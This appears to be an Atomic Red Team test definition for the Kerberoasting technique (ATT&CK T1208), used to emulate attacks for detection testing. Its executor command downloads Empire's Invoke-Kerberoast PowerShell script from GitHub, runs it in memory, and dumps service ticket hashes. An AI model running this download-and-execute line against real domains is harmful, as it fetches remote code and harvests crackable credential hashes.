---
attack_technique: T1208
display_name: Kerberoasting

atomic_tests:
- name: Request for service tickets
  auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a
  description: |
    This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
    
    The following are further sources and credits for this attack:
    [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
    [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
    when executed successfully , the test displays available services with their hashes. 
    If the testing domain doesn't have any service principal name configured, there is no output 
  
  supported_platforms:
    - windows

  executor:
    name: powershell
    elevation_required: false  
    command: | 
      iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1)
      Invoke-Kerberoast | fl
